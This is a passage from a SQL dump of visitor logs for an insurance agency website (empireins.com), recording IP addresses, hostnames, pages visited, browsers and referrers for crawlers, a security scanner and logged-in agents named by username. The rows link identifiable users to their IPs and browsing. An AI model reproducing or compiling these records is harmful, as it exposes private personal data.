720','','','','','','0','0',0),(25053,'0b_ea33ef5e740ecdaae183c22f97ec8c15','1462457020','155.188.123.18','155.188.123.18','/about-us/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1280 x 720','','','','','','0','0',0),(25056,'0b_ea33ef5e740ecdaae183c22f97ec8c15','1462457089','155.188.123.18','155.188.123.18','/carriers/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/about-us/','',0,'Win7 x64','IE 11','us','1280 x 720','','','','','','0','0',0),(25058,'0b_70d41f7b42e0471fe7e4a2a46e2a5432','1462457741','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(25061,'0b_70d41f7b42e0471fe7e4a2a46e2a5432','1462457742','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(25064,'0b_d3c725940344571a2115cbd4d0d83619','1462458329','67.85.210.17','ool-4355d211.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win8','Chrome 50','us','','','','','','','0','0',0),(25067,'0b_d3c725940344571a2115cbd4d0d83619','1462458331','67.85.210.17','ool-4355d211.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 50','us','','','','','','','0','0',0),(25070,'0b_0c0d9d351fa0f92025069281d3b1231f','1462458334','67.85.210.17','ool-4355d211.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','','',0,'Win8 x64','Firefox 45','us','1600 x 900','','','','','','0','0',0),(25073,'0b_0c0d9d351fa0f92025069281d3b1231f','1462458335','67.85.210.17','ool-4355d211.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','http://www.empireins.com/','',0,'Win8 x64','Firefox 45','us','1600 x 900','','','','','','0','0',0),(25076,'0b_0c0d9d351fa0f92025069281d3b1231f','1462458339','67.85.210.17','ool-4355d211.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','http://www.empireins.com/','',0,'Win8 x64','Firefox 45','us','1600 x 900','','','','','','0','0',0),(25079,'0b_9909346e2244c6286bbfe44f7a75a1ea','1462459069','67.85.210.17','ool-4355d211.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 50','us','1600 x 900','','','','','','0','0',0),(25080,'0b_6868e1f0dc982933a923eea7c3cd833a','1462459157','180.76.15.154','baiduspider-180-76-15-154.crawl.baidu.com','/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(25082,'0b_958ee514db1d17a1dff51afdc5b95752','1462459249','207.46.13.127','msnbot-207-46-13-127.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(25085,'0b_958ee514db1d17a1dff51afdc5b95752','1462459256','207.46.13.127','msnbot-207-46-13-127.search.msn.com','/products.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(25088,'0b_347fc1786e3de1ea7fe5cfaf5ff24536','1462459656','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(25089,'0b_347fc1786e3de1ea7fe5cfaf5ff24536','1462459658','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(25091,'0b_347fc1786e3de1ea7fe5cfaf5ff24536','1462459660','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(25094,'0b_347fc1786e3de1ea7fe5cfaf5ff24536','1462459671','108.58.88.178','ool-6c3a58b2.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','51',0),(25095,'0b_6ce549fc1380fcc436b8d8ee8aa5e4b6','1462460544','184.154.139.23','placeholder.sitelock.com','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(25097,'0b_6ce549fc1380fcc436b8d8ee8aa5e4b6','1462460547','184.154.139.23','placeholder.sitelock.com','/th1s_1s_a_4o4.html','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(25098,'0b_6ce549fc1380fcc436b8d8ee8aa5e4b6','1462460549','184.154.139.23','placeholder.sitelock.com','/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(25100,'0b_6ce549fc1380fcc436b8d8ee8aa5e4b6','1462460550','184.154.139.23','placeholder.sitelock.com','/licensing-contracting/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(25101,'0b_6ce549fc1380fcc436b8d8ee8aa5e4b6','1462460553','184.154.139.23','placeholder.sitelock.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(25104,'0b_6ce549fc1380fcc436b8d8ee8aa5e4b6','1462460555','184.154.139.23','placeholder.sitelock.com','/carriers/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(25106,'0b_6ce549fc1380fcc436b8d8ee8aa5e4b6','1462460557','184.154.139.23','placeholder.sitelock.com','/contact/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(25107,'0b_6ce549fc1380fcc436b8d8ee8aa5e4b6','1462460560','184.154.139.23','placeholder.sitelock.com','/case-status/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(25109,'0b_be89ce6558b419c0e0c9d7dfa4d40107','1462460562','184.154.139.23','placeholder.sitelock.com','/?page_id=171?a=pwdreset','SiteLockSpider [en] (WinNT; I ;Nav)','','',0,'WinNT','','','','','SiteLockSpider','','','','0','0',0),(25110,'0b_6ce549fc1380fcc436b8d8ee8aa5e4b6','1462460563','184.154.139.23','placeholder.sitelock.com','/contact/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(25112,'0b_6360da0f3313fcc6e66b22cfc70f84f0','1462461512','180.76.15.27','baiduspider-180-76-15-27.crawl.baidu.com','/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(25113,'0b_347fc1786e3de1ea7fe5cfaf5ff24536','1462461743','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','51',0),(25116,'0b_347fc1786e3de1ea7fe5cfaf5ff24536','1462461744','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','0',0),(25119,'0b_347fc1786e3de1ea7fe5cfaf5ff24536','1462461749','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','51',0),(25121,'0b_347fc1786e3de1ea7fe5cfaf5ff24536','1462461778','108.58.88.178','ool-6c3a58b2.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','51',0),(25122,'0b_953cf074fad2bfbb1c2258a8d4048b18','1462462041','78.199.203.39','fzd33-1-78-199-203-39.fbx.proxad.net','/','Mozilla/5.0 (X11; CrOS i686 12.0.742.91) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.93 Safari/534.30','','',0,'X11','Chrome 12','us','','','','','','','0','0',0),(25125,'0b_422d20fba94a286b25f1d7a142c14154','1462462995','66.249.64.34','crawl-66-249-64-34.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(25127,'0b_83c893c956e831607d2a3e388f41f37e','1462463360','206.210.17.33','proxy3.newyorklife.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win7','Chrome 50','us','1280 x 1024','Google','','','','','0','0',0),(25130,'0b_a8d1c2f7148176dd2972c8064ab06b8e','1462463363','206.210.17.33','proxy3.newyorklife.com','/feed/','Mozilla/4.0 (compatible;)','','',0,'','Netscape 4','','','','','','','','0','0',0),(25131,'0b_a8d1c2f7148176dd2972c8064ab06b8e','1462463364','206.210.17.33','proxy3.newyorklife.com','/home/feed/','Mozilla/4.0 (compatible;)','','',0,'','Netscape 4','','','','','','','','0','0',0),(25134,'0b_a8d1c2f7148176dd2972c8064ab06b8e','1462463364','206.210.17.33','proxy3.newyorklife.com','/assets/js/google-code-prettify/prettify.css','Mozilla/4.0 (compatible;)','','',0,'','Netscape 4','','','','','','','','0','0',0),(25137,'0b_83c893c956e831607d2a3e388f41f37e','1462463365','206.210.17.33','proxy3.newyorklife.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1280 x 1024','','','','','','0','0',0),(25140,'0b_a8d1c2f7148176dd2972c8064ab06b8e','1462463693','206.210.17.33','proxy3.newyorklife.com','/comments/feed/','Mozilla/4.0 (compatible;)','','',0,'','Netscape 4','','','','','','','','0','0',0),(25143,'0b_7acdce7bff69348c93003b7a9c5b6f20','1462465680','178.162.199.89','178.162.199.89','/robots.txt','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0','','',0,'Win8 x64','Firefox 39','','','','Unknown Spider','','','','0','0',0),(25146,'0b_b7f48572b67adc979edba91c62772d46','1462465876','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(25149,'0b_cf115dea33c6a26071ee8935e58ae8ac','1462467008','207.46.13.97','msnbot-207-46-13-97.search.msn.com','/companylinks.htm','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(25152,'0b_1ed913c44e74bc4c582cf9aa56dffe0d','1462467672','45.79.89.188','li1188-188.members.linode.com','/','Mozilla/5.0 (compatible; Uptimebot/1.0; +http://www.uptime.com/uptimebot)','http://uptime.com/empireins.com','',0,'','','','','','Uptimebot','','','','0','0',0),(25155,'0b_d0ee3732df910e2e08d319d9c5ca9d9f','1462468006','50.108.153.152','50.108.153.152','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win7','Chrome 50','us','1920 x 1080','','','','ykaufman','','0','0',0),(25157,'0b_d0ee3732df910e2e08d319d9c5ca9d9f','1462468017','50.108.153.152','50.108.153.152','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','ykaufman','','0','0',0),(25158,'0b_d0ee3732df910e2e08d319d9c5ca9d9f','1462468030','50.108.153.152','50.108.153.152','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','ykaufman','','0','0',0),(25160,'0b_d0ee3732df910e2e08d319d9c5ca9d9f','1462468047','50.108.153.152','50.108.153.152','/case-status/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','ykaufman','','0','51',0),(25163,'0b_53b218571312652319e0804b5b0cee76','1462468055','69.164.140.246','69.164.140.246.xchangetele.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win7','Chrome 50','us','1600 x 900','','','','','','0','0',0),(25164,'0b_53b218571312652319e0804b5b0cee76','1462468055','69.164.140.246','69.164.140.246.xchangetele.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1600 x 900','','','','','','0','0',0),(25167,'0b_53b218571312652319e0804b5b0cee76','1462468059','69.164.140.246','69.164.140.246.xchangetele.com','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1600 x 900','','','','','','0','0',0),(25169,'0b_53b218571312652319e0804b5b0cee76','1462468220','69.164.140.246','69.164.140.246.xchangetele.com','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win7','Chrome 50','us','1600 x 900','','','','','','0','51',0),(25170,'0b_d0ee3732df910e2e08d319d9c5ca9d9f','1462468230','50.108.153.152','50.108.153.152','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win7','Chrome 50','us','1920 x 1080','','','','ykaufman','','0','0',0),(25172,'0b_d0ee3732df910e2e08d319d9c5ca9d9f','1462468244','50.108.153.152','50.108.153.152','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','ykaufman','','0','51',0),(25175,'0b_d0ee3732df910e2e08d319d9c5ca9d9f','1462468242','50.108.153.152','50.108.153.152','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','ykaufman','','0','0',0),(25176,'0b_d0ee3732df910e2e08d319d9c5ca9d9f','1462468270','50.108.153.152','50.108.153.152','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','ykaufman','','0','0',0),(25179,'0b_d0ee3732df910e2e08d319d9c5ca9d9f','1462468286','50.108.153.152','50.108.153.152','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','ykaufman','','0','51',0),(25181,'0b_53b218571312652319e0804b5b0cee76','1462468370','69.164.140.246','69.164.140.246.xchangetele.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win7','Chrome 50','us','1600 x 900','','','','','','0','51',0),(25182,'0b_53b218571312652319e0804b5b0cee76','1462468370','69.164.140.246','69.164.140.246.xchangetele.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1600 x 900','','','','','','0','0',0),(25184,'0b_53b218571312652319e0804b5b0cee76','1462468377','69.164.140.246','69.164.140.246.xchangetele.com','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1600 x 900','','','','','','0','51',0),(25185,'0b_53b218571312652319e0804b5b0cee76','1462468406','69.164.140.246','69.164.140.246.xchangetele.com','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 50','us','1600 x 900','','','','zenwirth','','0','51',0),(25187,'0b_53b218571312652319e0804b5b0cee76','1462468573','69.164.140.246','69.164.140.246.xchangetele.com','/case-status/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 50','us','1600 x 900','','','','zenwirth','','0','51',0),(25188,'0b_53b218571312652319e0804b5b0cee76','1462468719','69.164.140.246','69.164.140.246.xchangetele.com','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 50','us','1600 x 900','','','','zenwirth','','0','51',0),(25190,'0b_54a7844e7d9b664a9a2ae7d0beb302e8','1462469190','66.249.64.166','crawl-66-249-64-166.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(25193,'0b_35827b37564a0277e5c7fcafd6bfa151','1462470935','75.99.37.250','ool-4b6325fa.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win7','Chrome 50','us','1920 x 1080','Google','','','','','0','0',0),(25196,'0b_35827b37564a0277e5c7fcafd6bfa151','1462470940','75.99.37.250','ool-4b6325fa.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','0','0',0),(25199,'0b_35827b37564a0277e5c7fcafd6bfa151','1462470960','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','0','51',0),(25200,'0b_956c68db14db03fc04bb9b41d29ea9ae','1462472633','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(25203,'0b_956c68db14db03fc04bb9b41d29ea9ae','1462472635','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(25206,'0b_c142d37f225875682b2147498aa58e20','1462473834','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','joelgoldberger','','0','0',0),(25209,'0b_c142d37f225875682b2147498aa58e20','1462473857','75.99.37.250','ool-4b6325fa.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','joelgoldberger','','0','51',0),(25211,'0b_c142d37f225875682b2147498aa58e20','1462473858','75.99.37.250','ool-4b6325fa.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','joelgoldberger','','0','0',0),(25212,'0b_c142d37f225875682b2147498aa58e20','1462474311','75.99.37.250','ool-4b6325fa.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','joelgoldberger','','0','51',0),(25214,'0b_ed4ed67bcdca86054dfc73728c803381','1462476109','5.248.253.133','5-248-253-133-broadband.kyivstar.net','/','Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)','http://pozdrawleniya.com/','',0,'Windows','IE 6','','','','','','','','0','0',0),(25217,'0b_ed4ed67bcdca86054dfc73728c803381','1462476109','5.248.253.133','5-248-253-133-broadband.kyivstar.net','/','Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)','http://pozdrawleniya.com/','',0,'Windows','IE 6','','','','','','','','0','0',0),(25218,'0b_092267742d6994cfdf79681dcadd913c','1462476968','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(25220,'0b_092267742d6994cfdf79681dcadd913c','1462476970','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(25223,'0b_a90c86dcd5ea9e7a988fb3285aab6a8e','1462477283','66.249.64.166','crawl-66-249-64-166.googlebot.com','/','DoCoMo/2.0 N905i(c100;TB;W24H16) (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot-Mobile','','','','0','0',0),(25226,'0b_f45d83e0984472f0d83efec64324871e','1462478142','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win7','Chrome 50','us','','','','','','','0','0',0),(25229,'0b_f45d83e0984472f0d83efec64324871e','1462478143','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','','','','','','','0','0',0),(25232,'0b_5f1d8db67923f956cc3daaacb7463b79','1462479600','104.162.177.252','cpe-104-162-177-252.nyc.res.rr.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D167 Safari/9537.53','https://www.google.com/','_notprovided_',1,'iPhone OS','Safari 7 Mobile','us','','Google','','','','','0','0',0),(25235,'0b_5f1d8db67923f956cc3daaacb7463b79','1462479602','104.162.177.252','cpe-104-162-177-252.nyc.res.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D167 Safari/9537.53','http://www.empireins.com/','',0,'iPhone OS','Safari 7 Mobile','us','','','','','','','0','0',0),(25238,'0b_5f1d8db67923f956cc3daaacb7463b79','1462479757','104.162.177.252','cpe-104-162-177-252.nyc.res.rr.com','/about-us/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D167 Safari/9537.53','http://www.empireins.com/','',0,'iPhone OS','Safari 7 Mobile','us','','','','','','','0','0',0),(25241,'0b_5f1d8db67923f956cc3daaacb7463b79','1462479851','104.162.177.252','cpe-104-162-177-252.nyc.res.rr.com','/contact/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D167 Safari/9537.53','http://www.empireins.com/about-us/','',0,'iPhone OS','Safari 7 Mobile','us','','','','','','','0','0',0),(25244,'0b_c1b2e39df742814b07796ef7e9c0d489','1462480062','180.76.15.28','baiduspider-180-76-15-28.crawl.baidu.com','/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(25245,'0b_0a033f26cc402a4613103afdfe322dde','1462480603','108.21.214.226','pool-108-21-214-226.nycmny.fios.verizon.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://r.search.yahoo.com/_ylt=A0LEV2DLritXJyMAdAtXNyoA;_ylu=X3oDMTByOHZyb21tBGNvbG8DYmYxBHBvcwMxBHZ0aWQDBHNlYwNzcg--/RV=2/RE=1462509388/RO=10/RU=http%3a%2f%2fwww.empireins.com%2f/RK=0/RS=CplVK2wL4dtauk9WuI9hYZCKmhM-','_ylt=A0LEV2DLritXJyMAdAtXNyoA;_ylu=X3oDMTByOHZyb21tBGNvbG8DYmYxBHBvcwMxBHZ0aWQDBHNlYwNzcg--',1,'Win7 x64','IE 